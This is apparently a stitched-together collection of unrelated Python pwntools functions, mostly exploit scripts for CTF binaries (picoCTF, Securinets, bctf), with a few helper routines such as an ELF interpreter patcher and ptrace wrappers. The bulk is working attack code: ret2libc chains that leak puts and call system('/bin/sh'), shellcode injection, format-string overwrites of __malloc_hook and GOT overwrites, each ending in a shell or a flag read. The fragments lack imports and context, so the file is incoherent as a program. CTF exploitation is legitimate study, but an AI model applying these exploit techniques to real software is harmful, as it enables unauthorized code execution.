def change_ld(binary, version, copy=True):
if os.path.exists("/home/pu1p/glibcs"):
GLIBCS_PATH = "/home/pu1p/glibcs"
elif os.path.exists("/var/glibcs"):
GLIBCS_PATH = "/var/glibcs"
else:
print("unknown glibc path")
return
def _cp_ld_libc(_version):
ld_path = "%s/ld_and_libcs_x64/ld_%s.so" % (GLIBCS_PATH, _version)
libc_path = "%s/ld_and_libcs_x64/libc_%s.so" % (GLIBCS_PATH, _version)
print(ld_path)
print(libc_path)
if not os.path.exists(ld_path):
return ""
os.system("cp %s ./" % (ld_path))
os.system("cp %s ./" % (libc_path))
return "ld_%s.so" % (_version)
if copy:
ld = _cp_ld_libc(version)
if ld == "":
print("version not exist")
return -1
else:
ld = version
if not os.access(ld, os.R_OK):
pwn.log.failure("Invalid path {} to ld".format(ld))
return None
if not os.access(binary, os.R_OK):
pwn.log.failure("Invalid path {} to binary".format(binary))
return None
binary = pwn.ELF(binary)
path = './{}_{}'.format(os.path.basename(binary.path), ld.split('.')[-2])
if os.access(path, os.F_OK):
os.remove(path)
print("remove exist file.....")
# return pwn.ELF(path)
for segment in binary.segments:
# print(segment.header['p_type'])
if segment.header['p_type'] == 'PT_INTERP':
# print("into this")
size = segment.header['p_memsz']
addr = segment.header['p_paddr']
data = segment.data()
if size <= len(ld):
pwn.log.failure(
"Failed to change PT_INTERP from {} to {}".format(
data, ld))
return None
binary.write(addr, ld.ljust(size, '\x00'))
break
binary.save(path)
os.chmod(path, 0b111000000) #rwx------
pwn.log.info(
"PT_INTERP has changed from {} to {}. Using temp file {}".format(
data, ld, path))
return pwn.ELF(path)
def __init__(self, binary : str, libc : str = None):
if libc == None:
libc = DEFAULT_LIBC
self.binaryname = binary
self.binary_elf = pwn.ELF(binary)
self.libc_elf = pwn.ELF(libc)
self.project = angr.Project(binary, auto_load_libs=False)
self.db = BinaryDb()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF('baby_bof')
libc = pwn.ELF('libc-2.31.so')
rop = pwn.ROP(elf)
pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
payload = b'A' * 18
payload += pop_rdi
payload += pwn.p64(elf.got['puts'])
payload += pwn.p64(elf.plt['puts'])
payload += pwn.p64(elf.sym['vuln'])
pr.sendlineafter("me\n", payload)
print(pr.readline())
out = pr.readline().strip()
puts_addr = int.from_bytes(out[:8], 'little')
print('puts @', hex(puts_addr))
"""Also works
if remote:
sys = puts_addr - 0x32190
bin_sh = puts_addr + 0x13000a
else:
sys = puts_addr - 0x2e660
bin_sh = puts_addr + 0x116eb6
"""
libc.address = puts_addr - libc.symbols['puts']
sys = libc.symbols['system']
bin_sh = next(libc.search(b'/bin/sh'))
print('sys @', hex(sys))
print('bin_sh @', hex(bin_sh))
ret = pwn.p64(rop.find_gadget(['ret']).address)
payload = b'A' * 18
payload += ret
payload += pop_rdi
payload += pwn.p64(bin_sh)
payload += pwn.p64(sys)
payload += pwn.p64(elf.sym['vuln'])
print(payload)
pr.sendafter('me\n', payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(4))
except Exception as e:
print(e)
finally:
pr.close()
def __init__(self, local=True, debugger=True):
pwn.context.update({'os': 'linux', 'arch': 'amd64'})
self.elf = pwn.ELF('./main2_success')
self.libc = pwn.ELF('./libc.so.6')
if local:
_env = {'LD_PRELOAD': './libc.so.6'}
self.t = pwn.process(self.elf.path, env=_env)
else:
self.t = pwn.remote("bin.q21.ctfsecurinets.com", 1340)
if debugger and local:
gdb_cmd = ["b *addr", "c"]
pwn.gdb.attach(self.t, gdbscript="\n".join(gdb_cmd))
def attack():
pr = pwn.process([remote_binary], cwd=os.path.dirname(remote_binary))
try:
elf = pwn.ELF(remote_binary, False)
payload = pwn.p32(elf.got["exit"] - 12)
pr.readline()
fullname = int(pr.readline())
# fullname
shellcode = pwn.asm(
"jmp skip;" + "nop;" * 100 +
"{} skip: nop;".format(pwn.shellcraft.i386.linux.sh())).ljust(672 -
4)
shellcode += pwn.p32(73).ljust(72)
shellcode += pwn.p32(0x101)
print(pwn.hexdump(shellcode))
print("shellcode length:", len(shellcode))
pr.writelineafter("Input fullname\n", shellcode)
# lastname
payload = pwn.p32(0x101) # set size to 0
payload += pwn.p32(elf.got["exit"] - 12) + pwn.p32(fullname + 8)
payload = payload.ljust(256 - 4)
payload = "A" * (256 - 4) + payload + pwn.p32(0x101) # set size to 0
print(pwn.hexdump(payload))
print("payload length:", len(payload))
pr.writelineafter("Input lastname\n", payload)
pr.interactive()
finally:
pr.close()
def __init__(self, elf_filename):
"""
:param elf_filename: The ELF filename
:type elf_filename: str
"""
super(AsmElfFile, self).__init__(elf_filename)
self._file = pwn.ELF(elf_filename)
def attack():
try:
pr = pwn.process(remote_binary)
elf = pwn.ELF(remote_binary, False)
pr.sendlineafter("Input the name of a student\n", "A")
pr.sendlineafter(
"Input the name of the favorite professor of a student \n", "B")
pr.sendlineafter(
"Input the name of the student that will give the score \n", "A")
pr.sendlineafter(
"Input the name of the professor that will be scored \n", "B")
pr.sendlineafter("Input the score: \n", str(elf.sym["win"]))
pr.sendlineafter("Input the name of a student\n", "B")
pr.sendlineafter(
"Input the name of the favorite professor of a student \n", "C")
pr.sendlineafter(
"Input the name of the student that will give the score \n", "B")
pr.sendlineafter(
"Input the name of the professor that will be scored \n", "C")
pr.sendlineafter("Input the score: \n", str(1))
rsp = pr.readall(timeout=0.5)
print(rsp)
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
pop_rdi = pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
pop_rsi = pwn.p64(
rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address)
print(pop_rdi)
print(pop_rsi)
payload = b"A" * 72
payload += pop_rdi
payload += pwn.p64(0xdeadbeef)
payload += pop_rsi
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(0x1337c0de)
payload += pwn.p64(elf.sym['win'])
print(payload, len(payload))
pr.sendafter("joke\n", payload)
pr.sendline()
pr.sendline("cat flag.txt")
print(pr.readall(2))
except Exception as e:
print(e)
finally:
pr.close()
def setupPtraceProcess(self) -> PtraceProcess:
from ptrace.debugger.debugger import PtraceDebugger
assert isinstance(self.debugger, PtraceDebugger)
ptrace_proc = self.debugger.addProcess(self.popen_obj.pid,
is_attached=False,
seize=True)
ptrace_proc.interrupt(
) # seize does not automatically interrupt the process
ptrace_proc.setoptions(self.debugger.options)
# as soon as this variable is changed, process will launch. Here you can alter the process' personality
# warning: right now you can only SET flags, you CANNOT UNSET them. This feature can easily be added in launcher
launcher_ELF = pwn.ELF(path_launcher, False) # get ready to launch
ad = launcher_ELF.symbols["add_personality"]
add_personality = 0
if self.disable_randomization:
add_personality += 0x40000
add_personality = pack("<I", add_personality)
ptrace_proc.writeBytes(ad, add_personality)
ptrace_proc.cont()
event = ptrace_proc.waitEvent()
assert isinstance(event, ProcessExecution), str(
event) # execve syscall is hit
ptrace_proc.syscall()
ptrace_proc.waitSyscall()
return ptrace_proc
def solve(io):
for i in range(4):
io.recvline()
while True:
s = io.recvlineS().strip()
s = s[: s.rfind("'") + 1]
s = eval(s)
open("chall", "wb").write(s)
st = os.stat("chall")
os.chmod("chall", st.st_mode | stat.S_IEXEC)
pwn.context.binary = elf = pwn.ELF("chall")
offset = get_rip_offset("chall")
payload = get_ret2dlresolve(elf, offset)
io.sendline(payload)
io.sendline("cat flag.txt")
out = io.recvuntil("}")
start, end = out.rfind(b"bctf{"), out.rfind(b"}")
flag = out[start : end + 1]
print(f"[+] Flag: {flag}")
io.sendline("exit")
io.sendlineafter("flag>", flag)
def create_payload():
payload = b''
elf = pwn.ELF(remote_binary, False)
#payload += pwn.p32(0x8048430) # gets@plt
payload += pwn.p32(elf.sym['gets']) # gets@plt
payload += pwn.p32(elf.sym['display_flag'])
payload += pwn.p32(elf.sym['win1'])
return payload
def exploit(remote):
pwn.context.clear(bits=64)
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target, env={'LD_PRELOAD': 'libc-2.27.so'})
try:
elf = pwn.ELF(target, False)
libc = pwn.ELF('./libc-2.27.so', False)
# one_gadget libc-2.27.so from libc6_2.27-3ubuntu1.4_amd64.deb
gadgets = [0x4f3d5, 0x4f432, 0x10a41c]
payload = "%{}$p".format(23)
pr.sendlineafter("point\n", payload)
pr.readline()
# 0x00007fffffffda08│+0x0088: 0x00007ffff7dfb082 → <__libc_start_main+231> mov edi, eax
libc_start_main_addr = int(pr.readline().strip().decode(), 16) - 231
libc.sym['gadget'] = gadgets[2]
libc.address = libc_start_main_addr - libc.sym['__libc_start_main']
print('libc @', hex(libc.address))
print('gadget @', hex(libc.sym['gadget']))
print('__libc_start_main @', hex(libc_start_main_addr))
print('__malloc_hook @', hex(libc.sym['__malloc_hook']))
stack_offset = 6
payload = pwn.fmtstr_payload(
stack_offset, {libc.sym["__malloc_hook"]: libc.sym['gadget']},
write_size='short')
print(payload, len(payload))
pr.sendafter("point\n", payload)
pr.sendline()
payload = b"%65537$c"
pr.sendafter("point\n", payload)
pr.sendline()
pr.readline()
pr.sendline('cat flag.txt')
print(pr.readall(2))
except Exception as e:
print(e)
finally:
pr.close()
def exploit(remote=False):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
print(pr.readline())
"""
Find padding via gdb
gef➤ info frame
Stack level 0, frame at 0x7fffffffda48:
rip = 0x401153 in vuln; saved rip = 0x6161616161616164
called by frame at 0x7fffffffda58
Arglist at 0x6161616161616163, args:
Locals at 0x6161616161616163, Previous frame's sp is 0x7fffffffda50
Saved registers:
rip at 0x7fffffffda48
gef➤ pattern search 0x6161616161616164
[+] Searching '0x6161616161616164'
[+] Found at offset 24 (little-endian search) likely
[+] Found at offset 17 (big-endian search)
"""
payload = b'a' * 24
# gadgets from output of 'ROPgadget --binary weird-rop-f17e9f493733a383aac548dbf1320c33'
pop_rdx = pwn.p64(0x4010de)
mov_rax_0 = pwn.p64(0x401002)
mov_rax_1 = pwn.p64(0x40100a)
mov_rdi_1 = pwn.p64(0x401012)
xor_rdi_0x53 = pwn.p64(0x40107d)
xor_rdi_0x56 = pwn.p64(0x40101b)
xor_rdi_0x198 = pwn.p64(0x4010c3)
xor_rdi_0x19b = pwn.p64(0x40104c)
if remote:
payload += xor_rdi_0x56
payload += xor_rdi_0x53
else:
payload += xor_rdi_0x19b
payload += xor_rdi_0x198
payload += pop_rdx
payload += pwn.p64(0x19) # read length
payload += mov_rax_0
payload += pwn.p64(rop.find_gadget(['syscall'])[0])
payload += mov_rax_1
payload += mov_rdi_1
payload += pwn.p64(rop.find_gadget(['syscall'])[0])
pr.sendline(payload)
print(pr.readall(2))
finally:
pr.close()
def __init__(self, local=True, binary='', ip='', port=0):
self.elf = pwn.ELF(binary)
self.libc = self.elf.libc
self.rop_libc = pwn.ROP(self.libc)
self.rop_elf = pwn.ROP(self.elf)
if local:
self.proc = pwn.process(binary)
else:
self.proc = pwn.remote(ip, port)
def find_symbol(pr, canary, num):
elf = pwn.ELF(target, False)
payload = b'A' * 512 + pwn.p32(canary) + b'B' * 12
payload += pwn.p32(elf.plt['puts'])
payload += pwn.p32(elf.sym['win'])
payload += pwn.p32(elf.got['puts'])
pr.sendlineafter("What number would you like to guess?\n", str(num))
pr.sendlineafter("New winner!\nName? ", payload)
pr.readline()
pr.readline()
return pwn.u32(pr.readline()[:4])
def detect_segfault(canary):
ofs = 16
while True:
#payload = pwn.fit({ofs: pwn.p16(pwn.ELF(remote_binary, False).sym["display_flag"])}, filler='B')
payload = b"A" * ofs + pwn.p16(
pwn.ELF(remote_binary, False).sym["display_flag"])
rsp = send_payload(canary, payload)
if "pico" in rsp.lower():
print(rsp)
break
def segfault():
try:
pr = pwn.process(remote_binary)
elf = pwn.ELF(remote_binary, False)
print(elf.got)
pr.sendlineafter("Input address\n", str(elf.got["exit"]))
pr.sendlineafter("Input value?\n", str(elf.sym["win"]))
rsp = pr.readall(timeout=0.5)
print(rsp)
finally:
pr.close()
def exploit():
pr = pwn.connect(host, port)
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
payload = b"A" * 32
rop.set_lock()
rop.shell()
payload += rop.chain()
print('len:', len(payload), payload)
pr.sendlineafter("What would a hero say ?\n>>> ", payload)
print(pr.readall(2))
def main() -> None:
"""Does general setup and calls exploit."""
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <mode>")
sys.exit(0)
env = os.environ.copy()
try:
pwn.context.binary = pwn.ELF(BINARY)
except IOError:
print(f"Failed to load binary ({BINARY})")
mode = sys.argv[1]
env["TERM"] = "ansi77"
env["COLUMNS"] = "40"
env["ROWS"] = "20"
if mode == "local":
proc = pwn.process(BINARY, env=env)
elif mode == "debug":
proc = pwn.process(BINARY, env=env)
gdb_cmd = [
"tmux",
"split-window",
"-p",
"75",
"gdb",
BINARY,
str(proc.pid),
]
for cmd in GDB_COMMANDS:
gdb_cmd.append("-ex")
gdb_cmd.append(cmd)
gdb_cmd.append(BINARY)
subprocess.Popen(gdb_cmd)
elif mode == "local_hosted":
proc = pwn.remote("localhost", PORT)
elif mode == "remote":
proc = pwn.remote(HOST, PORT)
else:
print("Invalid mode")
sys.exit(1)
exploit(proc, mode)
def __init__(self, filename):
self.filename = pathlib.Path(filename)
self.elf = pwn.ELF(filename)
self._disassembled_cache = {}
self._loc_to_symbol = {}
# Find the locations of relaxant functions in the file
for symbol_name, symbol_loc in self.elf.symbols.items():
if symbol_name.startswith(("got.", "plt.")):
continue
symbol_loc = hex(symbol_loc)
logger.debug("Found symbol for %s at %s", symbol_name, symbol_loc)
self._loc_to_symbol[symbol_loc] = symbol_name
def attack():
elf = pwn.ELF(remote_binary)
for i in range(-512, 0, 1):
pr = pwn.process(remote_binary, cwd=os.path.dirname(remote_binary))
try:
pr.writelineafter("Input the integer value you want to put in the array\n", str(elf.sym["win"]))
pr.writelineafter("Input the index in which you want to put the value\n", str(i))
rsp = pr.readall(timeout=0.5)
if "pico" in rsp:
print(rsp)
break
finally:
pr.close()
def template(filename, host="", port=0):
tp = ""
with open("/mnt/hgfs/codes/pwn/pwn_framework/template.py", "r") as f1:
tp = f1.read()
if "/" in filename:
filename = filename.split("/")[-1]
tp = tp.replace("ARCH", pwn.ELF(filename).arch)
tp = tp.replace("FILENAME", filename)
tp = tp.replace("HOST", host)
tp = tp.replace("PORT", str(port))
with open("exp.py", "w") as f2:
f2.write(tp)
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
rop = pwn.ROP(elf)
main_addr = pr.readline().strip().decode()
main_addr = int(main_addr[main_addr.find('street ') + 7:], 16)
print('main @', hex(main_addr))
ca_addr = main_addr + (elf.sym['california'] - elf.sym['main'])
si_addr = main_addr + (elf.sym['silicon_valley'] - elf.sym['main'])
loss_addr = main_addr + (elf.sym['loss'] - elf.sym['main'])
print('ca @', hex(ca_addr))
print('si @', hex(si_addr))
print('loss @', hex(loss_addr))
"""
california() => win_land='/bin'
silicon_valley() => win_land='/bin/sh'
loss(0x1337c0de, 0xdeadc0de-0x1337c0de)
"""
pop_rdi = pwn.p64(main_addr +
(rop.find_gadget(['pop rdi', 'ret']).address -
elf.sym['main']))
pop_rsi = pwn.p64(main_addr + (
rop.find_gadget(['pop rsi', 'pop r15', 'ret']).address -
elf.sym['main']))
payload = b'A' * 40
payload += pwn.p64(ca_addr)
payload += pwn.p64(si_addr)
payload += pop_rdi + pwn.p64(0x1337c0de)
payload += pop_rsi + pwn.p64(0xcb760000) + pwn.p64(0xcb760000)
payload += pwn.p64(loss_addr)
print(len(payload), payload)
pr.sendafter('often?\n', payload)
pr.sendline()
pr.sendline('cat flag.txt')
print(pr.readall(4))
except Exception as e:
print(e)
finally:
pr.close()
def attack(remote):
pr = None
if remote:
pr = pwn.remote(host, port)
else:
pr = pwn.process(target)
try:
libc = CDLL('libc.so.6')
num = (libc.rand() % 100) + 1
pr.sendlineafter("What number would you like to guess?\n", str(num))
elf = pwn.ELF(target, False)
rop = pwn.ROP(elf)
payload = b'A' * 120
payload += pwn.p64(rop.find_gadget(['pop rdx', 'ret']).address)
payload += pwn.p64(elf.sym['__stack_prot'])
payload += pwn.p64(rop.find_gadget(['pop rax', 'ret']).address)
payload += pwn.p64(7) # PROT_READ|PROT_WRITE|PROT_EXEC
payload += pwn.p64(
0x0000000000419127
) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln``
# 0x0000000000419127 : mov qword ptr [rdx], rax ; ret
payload += pwn.p64(rop.find_gadget(['pop rdi', 'ret']).address)
payload += pwn.p64(elf.sym['__libc_stack_end'])
payload += pwn.p64(elf.sym['_dl_make_stack_executable'])
payload += pwn.p64(
0x0000000000451974
) # can't find this gadget in pwn, using result from ``ROPgadget --binary ./vuln``
# 0x0000000000451974 : push rsp ; ret
# http://shell-storm.org/shellcode/files/shellcode-603.php
shellcode = b"\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
payload += shellcode
print('payload:', payload, 'len:', len(payload))
pr.send(payload)
pr.readuntil("New winner!\nName? ")
pr.sendline()
print(pr.readline())
#pr.interactive()
pr.sendline("cat flag.txt;")
print('flag:', pr.readall(timeout=2).decode())
except Exception as e:
print(e)
finally:
pr.close()
def exploit(remote):
if remote:
pr = pwn.connect(host, port)
else:
pr = pwn.process(target)
try:
elf = pwn.ELF(target)
print('win_game @', hex(elf.sym['win_game']))
pr.sendlineafter('BOF it to start!\n', 'BOF')
payload = b'A' * 56
payload += pwn.p64(elf.sym['win_game'])
shouted = False
print(payload)
while True:
cmd = pr.readline()
print(cmd)
if b"Twist" in cmd:
if shouted:
pr.send(payload)
pr.sendline()
print(pr.readall(2))
else:
pr.sendline('T')
elif b"Pull" in cmd:
if shouted:
pr.send(payload)
pr.sendline()
print(pr.readall(2))
else:
pr.sendline('P')
elif b"BOF" in cmd:
if shouted:
pr.send(payload)
pr.sendline()
print(pr.readall(2))
else:
pr.sendline('B')
elif b"Shout" in cmd:
pr.send(payload)
pr.sendline()
shouted = True
finally:
pr.close()
def exploit():
conn = pwn.ssh(user, host, port, pw)
pr = conn.process(target)
try:
elf = pwn.ELF(target, False)
payload = b'A' * 52
payload += pwn.p32(elf.sym["main"] + 155)
pr.sendlineafter("Enter your favorite color: ", payload)
pr.sendline("cat flag.txt")
print(pr.readall(2).decode())
except Exception as ex:
print(ex)
finally:
pr.close()
def attack():
pr = pwn.process([remote_binary, 'A'], cwd=os.path.dirname(remote_binary))
try:
elf = pwn.ELF(remote_binary, False)
payload = pwn.p32(elf.got["exit"] - 12)
pr.readline()
first = int(pr.readline())
print("first:", first)
payload += pwn.p32(first + 8)
payload += pwn.asm("push {};ret;".format(elf.sym["win"]))
pr.writeline("A")
pr.writelineafter("an overflow will not be very useful...\n", payload)
rsp = pr.readall(timeout=0.5)
print(rsp)
finally:
pr.close()
def get_shell(pr, canary, sys_addr, binsh_addr):
elf = pwn.ELF(target, False)
payload = b'A' * 512 + pwn.p32(canary) + b'B' * 12
payload += pwn.p32(sys_addr)
payload += pwn.p32(elf.sym['win'])
payload += pwn.p32(binsh_addr)
"""the rop way
rop = pwn.ROP(elf)
rop.call(sys_addr, [binsh_addr])
payload += rop.chain()
"""
print('payload:', payload)
pr.sendafter("New winner!\nName? ", payload)
pr.sendline()
print(pr.readline())
print(pr.readline())
pr.sendline("cat flag.txt;")
print('flag:', pr.readall(timeout=2).decode())
def detect_segfault():
"""
Input result of `pwn.cyclic(128,n=8)`, we got a segfault. By checking the stack, we have
(gdb) info stack
#0 0x00000000004008cd in vuln ()
#1 0x616161616161616a in ?? ()
#2 0x616161616161616b in ?? ()
#3 0x616161616161616c in ?? ()
#4 0x616161616161616d in ?? ()
#5 0x616161616161616e in ?? ()
#6 0x616161616161616f in ?? ()
#7 0x6161616161616170 in ?? ()
#8 0x0000000000000000 in ?? ()
"""
ofs = pwn.cyclic_find(pwn.p64(0x616161616161616a), n=8) # 72
"""
A trick due to old code haven't been removed
payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["main"])
pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload);
payload = b'A'*ofs + pwn.p64(pwn.ELF(remote_binary, False).sym["flag"])
pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n", payload);
"""
for _ in range(0):
payload = b'A' * ofs + pwn.p64(
pwn.ELF(remote_binary, False).sym["main"])
pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n",
payload)
"""
According to the conditions we need to make `win1` and `win2` true by calling `win_fn1` and `win_fn2` before `win_fn`
"""
payload = b"A" * ofs + build_rop()
print("payload:\n", payload)
pr.writelineafter("Welcome to 64-bit. Can you match these numbers?\n",
payload)
rsp = pr.readall(timeout=0.5)
print('ofs:', ofs)
print('rsp:', rsp)
if rsp and "pico" in rsp.decode().lower():
print(rsp)
def _getElf(self, lib: str):
""" given a library name, load it as an pwn.ELF object and determine the baseAdress.
Makes sure there are not multiple librarys with the name
"""
if lib in self.elfDict:
return self.elfDict[lib]
else:
maps = getMappings(self.pid, lib)
if len(maps) == 0:
raise ValueError("lib not found")
# make sure there arent multiple libarys with the given infix
sortfunc = lambda mapping: mapping.pathname
maps = sorted(maps, key=sortfunc) # groupby requires sorted list
maps_group_pathname = []
for _, g in groupby(maps, sortfunc):
maps_group_pathname.append(list(g))
if len(maps_group_pathname) != 1:
assert len(maps_group_pathname) > 0
raise ValueError("multiple libs with what name")
# create ELF
full_path = maps_group_pathname[0][0].pathname
if full_path in self.elfDict:
return self.elfDict[full_path]
elf = pwn.ELF(full_path, False)
self.elfDict[lib] = elf
self.elfDict[full_path] = elf
# find base adress
keyfunc = lambda mapping: mapping.start
baseAd = min(maps_group_pathname[0], key=keyfunc).start
if not elf.pie:
baseAd = 0
self.baseDict[lib] = baseAd
elf.base = baseAd
return elf
